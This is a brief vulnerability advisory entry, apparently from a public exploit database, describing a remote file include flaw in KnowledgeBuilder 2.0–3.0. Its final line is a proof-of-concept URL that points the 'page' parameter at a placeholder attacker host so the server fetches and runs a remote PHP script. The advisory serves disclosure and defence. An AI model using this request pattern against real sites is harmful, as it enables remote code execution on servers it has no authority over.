KnowledgeBuilder 2.0/2.1/3.0 - Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:77239
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/9292/info

KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. 

http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script]